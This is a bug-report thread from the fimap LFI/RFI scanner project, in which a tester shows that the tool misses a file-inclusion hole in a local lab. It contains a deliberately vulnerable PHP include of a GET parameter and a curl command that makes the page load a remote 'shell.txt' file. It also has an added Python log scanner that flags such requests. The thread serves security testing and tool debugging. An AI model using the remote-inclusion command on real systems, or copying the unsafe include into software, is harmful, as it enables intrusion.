alfredleo / fimap

Automatically exported from code.google.com/p/fimap

fimap does not detect vulnerabilities #81

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
On which URL does this error occur? (Important!)

Tested URL: http://127.0.0.1/vulnerable.php?COLOR=red

vulnerable.php contents:

<?php
   if ( isset( $_GET['COLOR'] ) ) {
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

Which version of fimap are you using? (You can see that in the very first line)

v.1.00_svn

On what operating system?

Kali Linux

Please provide any additional information below.

php.ini has the following set and testing the vulnerable code manually works:

allow_url_include = On

For any URL tested, the results are always the same:

SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[14:21:07] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[14:21:07] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(

Original issue reported on code.google.com by doo...@kali.org on 24 Mar 2015 at 4:17

GoogleCodeExporter commented 9 years ago
Hi,

Does this resolve your issue?
https://code.google.com/p/fimap/wiki/BlindMode

If not please leave another comment and I will check it more deeply.

-imax.

Original comment by fimap....@gmail.com on 24 Mar 2015 at 5:58

GoogleCodeExporter commented 9 years ago
Thanks for the reply. Unfortunately, it's still not behaving properly and I've pasted the output below for fimap and doing it manually with curl.

root@kali:~/fimap/src# ./fimap.py -u "http://127.0.0.1/vulnerable.php?COLOR=red" -b
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[11:30:43] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[11:30:43] [INFO] Fiddling around with URL...
[11:30:43] [INFO] Sniper failed. Going blind...
Target URL isn't affected by any file inclusion bug :(

root@kali:~/fimap/src# curl 'http://127.0.0.1/vulnerable.php?COLOR=http://172.16.206.148/shell.txt?'
remote shell inside!
root@kali:~/fimap/src#

Thanks!
dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 11:35
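
Requests shaped like the curl test in the comment above stand out in web server access logs. The following is an added example, not part of the original thread or of fimap, showing one way to flag them. The log lines, the host 192.0.2.10 and the names `classify` and `scan` are constructed for illustration, and the checks go slightly beyond the thread's single case by also covering path traversal and null bytes.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (not from the issue); 192.0.2.10 is a
# documentation-range placeholder for the remote host.
SAMPLE_LOG = """\
127.0.0.1 - - [25/Mar/2015:11:30:43 +0000] "GET /vulnerable.php?COLOR=red HTTP/1.1" 200 312 "-" "curl/7.38.0"
127.0.0.1 - - [25/Mar/2015:11:31:02 +0000] "GET /vulnerable.php?COLOR=http://192.0.2.10/shell.txt? HTTP/1.1" 200 20 "-" "curl/7.38.0"
127.0.0.1 - - [25/Mar/2015:11:31:05 +0000] "GET /vulnerable.php?COLOR=http%3A%2F%2F192.0.2.10%2Fshell.txt%3F HTTP/1.1" 200 20 "-" "-"
127.0.0.1 - - [25/Mar/2015:11:31:09 +0000] "GET /vulnerable.php?COLOR=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 0 "-" "-"
127.0.0.1 - - [25/Mar/2015:11:31:15 +0000] "GET /search.php?q=http+proxy+setup HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
CHECKS = {
    # Value begins with a PHP stream wrapper, as in the curl request above.
    "wrapper": re.compile(r"^(?:https?|ftps?|php|file|expect|phar|zip)://|^data:", re.I),
    "traversal": re.compile(r"\.\.[\\/]"),
    "null-byte": re.compile(r"\x00"),
}

def classify(value):
    """Return the names of every check that matches a decoded parameter value."""
    return [name for name, rx in CHECKS.items() if rx.search(value)]

def scan(log_text):
    """Return (path, parameter, decoded value, reasons) per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        # parse_qsl percent-decodes, so raw and encoded requests look the same.
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify(value)
            if reasons:
                findings.append((path, param, value, reasons))
    return findings

if __name__ == "__main__":
    for path, param, value, reasons in scan(SAMPLE_LOG):
        print(f"{path} {param}={value!r} -> {', '.join(reasons)}")
```

The benign `COLOR=red` and `q=http+proxy+setup` requests are not flagged, because the wrapper check only matches a scheme at the start of the decoded value.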

GoogleCodeExporter commented 9 years ago
This issue was closed by revision r333.

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:15

GoogleCodeExporter commented 9 years ago
Hi Dookie,

Thank you a lot for your report!
I could reproduce this error and fix it.

Please check out the newest version and let me know if this issue is history.

Again, thank you a lot for your time to report. :)
-imax

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:18

GoogleCodeExporter commented 9 years ago
Tested and confirmed working. Thanks for the quick fix!

dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 3:25